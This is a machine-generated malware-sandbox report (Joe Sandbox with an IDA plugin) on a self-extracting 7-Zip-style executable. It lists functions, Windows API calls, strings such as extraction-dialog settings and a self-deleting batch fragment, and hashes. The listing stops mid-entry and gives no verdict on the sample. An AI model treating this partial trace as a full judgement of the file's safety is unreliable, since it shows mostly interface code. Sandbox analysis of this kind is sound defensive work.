Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: ??3@$File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
API String ID: 3007203151-3467708659
Opcode ID: 867eebb51e1b750364ee620a5f1ec15cba4384e9a655442323ea2c3f34152715
Instruction ID: 7a4c4b622d76ac6c1822c64a370ea4e05d699ec4102568342bfcf68b8c9639ad
Opcode Fuzzy Hash: 867eebb51e1b750364ee620a5f1ec15cba4384e9a655442323ea2c3f34152715
Instruction Fuzzy Hash: DE416171D01119BADB00EBA5ED85DEEBB78EF44358F50803AF511720E1EB78AE85CB58

Function 00404603 Relevance: 35.2, APIs: 3, Strings: 17, Instructions: 207stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,0041442C,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004046DF

Part of subcall function 00401F9D: GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
Part of subcall function 00401F9D: wsprintfW.USER32 ref: 00401FFD
Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 00402017
Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 0040204C
Part of subcall function 00401F9D: lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
Part of subcall function 00401F9D: SetLastError.KERNEL32(00000000), ref: 00402098
Part of subcall function 00401F9D: lstrlenA.KERNEL32(00413FD0), ref: 004020CC
Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
Part of subcall function 00401F9D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119

_wtol.MSVCRT ref: 004047DC
_wtol.MSVCRT ref: 004047F8

Strings

GUIFlags, xrefs: 0040473E, 00404743, 0040475F
ExtractCancelText, xrefs: 004047A1
Title, xrefs: 00404611
ErrorTitle, xrefs: 0040467F
ExtractDialogWidth, xrefs: 004047BE
MiscFlags, xrefs: 00404771, 00404776, 00404792
ExtractPathText, xrefs: 00404819
CancelPrompt, xrefs: 00404831
ExtractTitle, xrefs: 004046AF
GUIMode, xrefs: 004046F4
WarningTitle, xrefs: 00404697
ExtractPathTitle, xrefs: 00404801
|wA, xrefs: 0040464B
Progress, xrefs: 004046C7
ExtractDialogText, xrefs: 004047AD
OverwriteMode, xrefs: 00404721
ExtractPathWidth, xrefs: 004047E5

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: ErrorLast$??2@EnvironmentVariable_wtollstrcmpi$??3@InfoLocalelstrlenwsprintf
String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$Progress$Title$WarningTitle$|wA
API String ID: 2725485552-3187639848
Opcode ID: 7a70c90a09e6339ceb99db9b5511794fba0efbdd365b8bdd8dc3dc4b6a1705ac
Instruction ID: a5d789275b7dd46d140941e9fd319bf554fc7ea6ad5da08365fcb0f0a182a74d
Opcode Fuzzy Hash: 7a70c90a09e6339ceb99db9b5511794fba0efbdd365b8bdd8dc3dc4b6a1705ac
Instruction Fuzzy Hash: 4251B5F1A402047EDB10BB619D86EFF36ACDA85308B64443BF904F32C1E6BC5E854A6D

Function 00402DC0 Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 123windowlibrarystringCOMMON

Download Yara Rule

APIs

GetClassNameA.USER32(?,?,00000040), ref: 00402DD3
lstrcmpiA.KERNEL32(?,STATIC), ref: 00402DE6
GetWindowLongW.USER32(?,000000F0), ref: 00402DF3

Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB

Part of subcall function 00401A85: CharUpperW.USER32(?,74DEE0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
Part of subcall function 00401A85: CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF

??3@YAXPAX@Z.MSVCRT(?), ref: 00402E20
GetParent.USER32(?), ref: 00402E2E
LoadLibraryA.KERNEL32(riched20), ref: 00402E42
GetMenu.USER32(?), ref: 00402E55
SetThreadLocale.KERNEL32(00000419), ref: 00402E62
CreateWindowExW.USER32(00000000,RichEdit20W,0041335C,50000804,?,?,?,?,?,00000000,00000000,00000000), ref: 00402E92
DestroyWindow.USER32(?), ref: 00402EA3
SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00402EB8
GetSysColor.USER32(0000000F), ref: 00402EBC
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00402ECA
SendMessageW.USER32(00000000,00000461,?,?), ref: 00402EF5
??3@YAXPAX@Z.MSVCRT(?), ref: 00402EFA
??3@YAXPAX@Z.MSVCRT(?,?), ref: 00402F02

Strings

RichEdit20W, xrefs: 00402E8C
riched20, xrefs: 00402E3D
{\rtf, xrefs: 00402E09
STATIC, xrefs: 00402DDD

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: Window$??3@MessageSend$CharTextUpper$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
String ID: RichEdit20W$STATIC$riched20${\rtf
API String ID: 1731037045-2281146334
Opcode ID: 2b38b22499d69b5ca28c01525db5cb238b78fd2564d1ef548c56061806c72a13
Instruction ID: c7c9ca1f65d7473fe19c29f8272bdbb18bb8b251efb89c9ee4785ec66c96c850
Opcode Fuzzy Hash: 2b38b22499d69b5ca28c01525db5cb238b78fd2564d1ef548c56061806c72a13
Instruction Fuzzy Hash: FE316072A40119BFDB01AFA5DD49DEF7BBCEF08745F104036F601B21D1DA789A008B68

Function 00401CC8 Relevance: 31.6, APIs: 21, Instructions: 121windowCOMMON

Download Yara Rule

APIs

GetWindowDC.USER32(00000000), ref: 00401CD4
GetDeviceCaps.GDI32(00000000,00000058), ref: 00401CE0
MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401CF9
GetObjectW.GDI32(?,00000018,?), ref: 00401D28
MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D33
MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D3D
CreateCompatibleDC.GDI32(?), ref: 00401D4B
CreateCompatibleDC.GDI32(?), ref: 00401D52
SelectObject.GDI32(00000000,?), ref: 00401D60
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401D6E
SelectObject.GDI32(00000000,00000000), ref: 00401D76
SetStretchBltMode.GDI32(00000000,00000004), ref: 00401D7E
StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401D9D
GetCurrentObject.GDI32(00000000,00000007), ref: 00401DA6
SelectObject.GDI32(00000000,?), ref: 00401DB3
SelectObject.GDI32(00000000,?), ref: 00401DB9
DeleteDC.GDI32(00000000), ref: 00401DC2
DeleteDC.GDI32(00000000), ref: 00401DC5
ReleaseDC.USER32(00000000,?), ref: 00401DCC
ReleaseDC.USER32(00000000,?), ref: 00401DDB
CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 00401DE8

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
String ID:
API String ID: 3462224810-0
Opcode ID: edcdae41b00ef410d3e7ba3ed19d3c131e86ad83f2f2f2d47359cb6bb3a71bdf
Instruction ID: 24730f8ff9b6a3f8d7f0600a39c6f646a54ca28d21b12e05547a6914d757f366
Opcode Fuzzy Hash: edcdae41b00ef410d3e7ba3ed19d3c131e86ad83f2f2f2d47359cb6bb3a71bdf
Instruction Fuzzy Hash: 00313976D00208BBDF215FA19C48EEFBFBDEB48752F108066F604B21A0C6758A50EB64

Function 00401DF3 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 120windowcommemoryCOMMON

Download Yara Rule

APIs

GetClassNameA.USER32(?,?,00000040), ref: 00401E05
lstrcmpiA.KERNEL32(?,STATIC), ref: 00401E1C
GetWindowLongW.USER32(?,000000F0), ref: 00401E2F
GetMenu.USER32(?), ref: 00401E44

Part of subcall function 00401BDF: GetModuleHandleW.KERNEL32(00000000), ref: 00401BEA
Part of subcall function 00401BDF: FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401C07
Part of subcall function 00401BDF: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401C1B
Part of subcall function 00401BDF: SizeofResource.KERNEL32(00000000,00000000), ref: 00401C2C
Part of subcall function 00401BDF: LoadResource.KERNEL32(00000000,00000000), ref: 00401C36
Part of subcall function 00401BDF: LockResource.KERNEL32(00000000), ref: 00401C41

GlobalAlloc.KERNEL32(00000040,00000010), ref: 00401E76
memcpy.MSVCRT(00000000,00000000,00000010), ref: 00401E83
CoInitialize.OLE32(00000000), ref: 00401E8C
CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00401E98
OleLoadPicture.OLEAUT32(?,00000000,00000000,00414C14,?), ref: 00401EBD
GlobalFree.KERNEL32(00000000), ref: 00401ECD

Part of subcall function 00401CC8: GetWindowDC.USER32(00000000), ref: 00401CD4
Part of subcall function 00401CC8: GetDeviceCaps.GDI32(00000000,00000058), ref: 00401CE0
Part of subcall function 00401CC8: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401CF9
Part of subcall function 00401CC8: GetObjectW.GDI32(?,00000018,?), ref: 00401D28
Part of subcall function 00401CC8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D33
Part of subcall function 00401CC8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D3D
Part of subcall function 00401CC8: CreateCompatibleDC.GDI32(?), ref: 00401D4B
Part of subcall function 00401CC8: CreateCompatibleDC.GDI32(?), ref: 00401D52
Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401D60
Part of subcall function 00401CC8: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401D6E
Part of subcall function 00401CC8: SelectObject.GDI32(00000000,00000000), ref: 00401D76
Part of subcall function 00401CC8: SetStretchBltMode.GDI32(00000000,00000004), ref: 00401D7E
Part of subcall function 00401CC8: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401D9D
Part of subcall function 00401CC8: GetCurrentObject.GDI32(00000000,00000007), ref: 00401DA6
Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401DB3
Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401DB9
Part of subcall function 00401CC8: DeleteDC.GDI32(00000000), ref: 00401DC2
Part of subcall function 00401CC8: DeleteDC.GDI32(00000000), ref: 00401DC5
Part of subcall function 00401CC8: ReleaseDC.USER32(00000000,?), ref: 00401DCC

GetObjectW.GDI32(00000000,00000018,?), ref: 00401EFF
SetWindowPos.USER32(00000010,00000000,00000000,00000000,?,?,00000006), ref: 00401F13
SendMessageW.USER32(00000010,00000172,00000000,?), ref: 00401F25
GlobalFree.KERNEL32(00000000), ref: 00401F3A

Strings

IMAGES, xrefs: 00401E4E
STATIC, xrefs: 00401E13

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
String ID: IMAGES$STATIC
API String ID: 4202116410-1168396491
Opcode ID: 352b3c5e08a174ec4a3ffb4ca519ce1611b0b6cc4168eadb64d38ca8f457be46
Instruction ID: 08c73d75f8249df6a552952f3d33af28cabbedea74541c6d0cfd8ce2793c0c4e
Opcode Fuzzy Hash: 352b3c5e08a174ec4a3ffb4ca519ce1611b0b6cc4168eadb64d38ca8f457be46
Instruction Fuzzy Hash: C7417C71A00218BFCB11DFA1DC49DEEBF7DEF08742B008076FA05A61A0DB758A41DB68

Function 0040813D Relevance: 27.1, APIs: 18, Instructions: 147windowcomtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950

GetDlgItem.USER32(?,000004B8), ref: 0040816A
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00408179
GetDlgItem.USER32(?,000004B5), ref: 004081C0
GetWindowLongW.USER32(00000000,000000F0), ref: 004081C5
GetDlgItem.USER32(?,000004B5), ref: 004081D5
SetWindowLongW.USER32(00000000), ref: 004081D8
GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 004081FE
EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00408210
GetDlgItem.USER32(?,000004B4), ref: 0040821A
SetFocus.USER32(00000000), ref: 0040821D
SetTimer.USER32(?,00000001,00000000,00000000), ref: 0040824C
CoCreateInstance.OLE32(00414C34,00000000,00000001,00414808,00000000), ref: 00408277
GetDlgItem.USER32(?,00000002), ref: 00408294
IsWindow.USER32(00000000), ref: 00408297
GetDlgItem.USER32(?,00000002), ref: 004082A7
EnableWindow.USER32(00000000), ref: 004082AA
GetDlgItem.USER32(?,000004B5), ref: 004082BE
ShowWindow.USER32(00000000), ref: 004082C1

Part of subcall function 00407134: GetDlgItem.USER32(?,000004B6), ref: 00407142

Part of subcall function 00407B33: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00407B6D
Part of subcall function 00407B33: GetDlgItem.USER32(?,000004B8), ref: 00407B8B
Part of subcall function 00407B33: SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00407B9D
Part of subcall function 00407B33: wsprintfW.USER32 ref: 00407BBB
Part of subcall function 00407B33: ??3@YAXPAX@Z.MSVCRT(?), ref: 00407C53

Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
Part of subcall function 00407D06: LoadIconW.USER32(00000000), ref: 00407D33
Part of subcall function 00407D06: GetSystemMetrics.USER32(00000032), ref: 00407D43
Part of subcall function 00407D06: GetSystemMetrics.USER32(00000031), ref: 00407D48
Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
Part of subcall function 00407D06: LoadImageW.USER32(00000000), ref: 00407D54
Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E76
Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E92

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: Item$Window$MessageSend$System$EnableHandleLoadLongMenuMetricsModuleShow$??3@CreateFocusIconImageInstanceTimerUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
String ID:
API String ID: 855516470-0
Opcode ID: f96aa9b93e1fd9714dbcbc8c2c582c1e46f74a713c41b2300bd45d2dcf84ac32
Instruction ID: 3ce0214ef3d03b0ee840dd4ab9c121ae631e901bc0d6870238ad5b6e85178a64
Opcode Fuzzy Hash: f96aa9b93e1fd9714dbcbc8c2c582c1e46f74a713c41b2300bd45d2dcf84ac32
Instruction Fuzzy Hash: 014174B0644748ABDA206F65DD49F5B7BADEB40B05F00847DF552A62E1CB79B800CA1C

Function 00403093 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 244stringCOMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,hAA,00000000), ref: 004030F6
??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,hAA,00000000), ref: 004030FE
strncmp.MSVCRT ref: 004031F1
??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00403255
lstrcmpW.KERNEL32(?,SetEnvironment,00000000), ref: 00403273
??3@YAXPAX@Z.MSVCRT(0040414C,?), ref: 00403347

Strings

GUIFlags, xrefs: 004032B2
SetEnvironment, xrefs: 0040326B
MiscFlags, xrefs: 004032C0
{\rtf, xrefs: 004031D6, 004031EB
hAA, xrefs: 0040309E

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: ??3@$lstrcmpstrncmp
String ID: GUIFlags$MiscFlags$SetEnvironment$hAA${\rtf
API String ID: 2881732429-172299233
Opcode ID: 436b0b5fdcd0fc7850317bda0c1040a654aafe726af0558e82b6743448b11ef5
Instruction ID: da55d09168dcf28f6e950782b6654b171f18f9ca5632fa18d2c46afc5d57570a
Opcode Fuzzy Hash: 436b0b5fdcd0fc7850317bda0c1040a654aafe726af0558e82b6743448b11ef5
Instruction Fuzzy Hash: 23819D31900218ABDF11DFA1CD55BEE7B78AF14305F1040ABE8017B2E6DB78AB05DB59

Function 00406A47 Relevance: 24.3, APIs: 16, Instructions: 270COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000004B3), ref: 00406A69
GetWindowLongW.USER32(00000000,000000F0), ref: 00406A6E
GetDlgItem.USER32(?,000004B4), ref: 00406AA5
GetWindowLongW.USER32(00000000,000000F0), ref: 00406AAA
GetSystemMetrics.USER32(00000010), ref: 00406B0B
GetSystemMetrics.USER32(00000011), ref: 00406B11
GetSystemMetrics.USER32(00000008), ref: 00406B18
GetSystemMetrics.USER32(00000007), ref: 00406B1F
GetParent.USER32(?), ref: 00406B43
GetClientRect.USER32(00000000,?), ref: 00406B55
ClientToScreen.USER32(?,?), ref: 00406B68
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00406BCE
GetClientRect.USER32(?,?), ref: 00406C55
ClientToScreen.USER32(?,?), ref: 00406B71

Part of subcall function 0040690F: GetDlgItem.USER32(?,?), ref: 0040691B

GetSystemMetrics.USER32(00000008), ref: 00406CD6
GetSystemMetrics.USER32(00000007), ref: 00406CDD

Part of subcall function 00406A18: GetDlgItem.USER32(?,?), ref: 00406A36
Part of subcall function 00406A18: SetWindowPos.USER32(00000000), ref: 00406A3D

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: MetricsSystem$ClientItemWindow$LongRectScreen$Parent
String ID:
API String ID: 747815384-0
Opcode ID: bdc5cc6ef77edd437f37f749138dc65a224d6988716d71e8386f1ae5cf91717f
Instruction ID: 701d8c843d4ec3579feae24e97f284edc15b0bac0439a5efdbaa5111af673c9b
Opcode Fuzzy Hash: bdc5cc6ef77edd437f37f749138dc65a224d6988716d71e8386f1ae5cf91717f
Instruction Fuzzy Hash: 7B912D71A00209AFDB14DFB9CD85AEEB7F9EF48704F148529E642F6290D778E9008B64

Function 00407D06 Relevance: 22.7, APIs: 15, Instructions: 231windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
LoadIconW.USER32(00000000), ref: 00407D33
GetSystemMetrics.USER32(00000032), ref: 00407D43
GetSystemMetrics.USER32(00000031), ref: 00407D48
GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
LoadImageW.USER32(00000000), ref: 00407D54
SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
GetWindow.USER32(?,00000005), ref: 00407E76
GetWindow.USER32(?,00000005), ref: 00407E92
GetWindow.USER32(?,00000005), ref: 00407EAA
GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,000004B2,?,000004B7,?,?,?,?,?,0040803E), ref: 00407F0A
LoadIconW.USER32(00000000), ref: 00407F0D
GetDlgItem.USER32(?,000004B1), ref: 00407F28
SendMessageW.USER32(00000000), ref: 00407F2F

Part of subcall function 0040725A: GetDlgItem.USER32(?,?), ref: 00407264
Part of subcall function 0040725A: GetWindowTextLengthW.USER32(00000000), ref: 0040726B

Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: Window$HandleItemLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
String ID:
API String ID: 1889686859-0
Opcode ID: 54e99e0b53345dbf389ae49fdb6e6d7c6227533794aadf34278c182137d853b4
Instruction ID: b6a50195b8a608de49edc5b96f3e83ee8a9b90890169e94b1220211b89b9884f
Opcode Fuzzy Hash: 54e99e0b53345dbf389ae49fdb6e6d7c6227533794aadf34278c182137d853b4
Instruction Fuzzy Hash: E861D47064C7096AE9257B61DC4AF3B3699AB40B05F10447FF642B92D2DBBCBC0056AF

Function 00406F37 Relevance: 16.6, APIs: 11, Instructions: 87windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00406F45
GetWindowLongW.USER32(00000000), ref: 00406F4C
DefWindowProcW.USER32(?,?,?,?), ref: 00406F62
CallWindowProcW.USER32(?,?,?,?,?), ref: 00406F7F
GetSystemMetrics.USER32(00000031), ref: 00406F91
GetSystemMetrics.USER32(00000032), ref: 00406F98
GetWindowDC.USER32(?), ref: 00406FAA
GetWindowRect.USER32(?,?), ref: 00406FB7
DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 00406FEB
ReleaseDC.USER32(?,00000000), ref: 00406FF3

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
String ID:
API String ID: 2586545124-0
Opcode ID: 25d202db14ae47cc7765131eef640a3ba3c2163a3dcc7105130798770ded3a1b
Instruction ID: b1ff7c23223d170b9333fa97acec74f2c9230ee3eabfe87d0be763292bfdf634
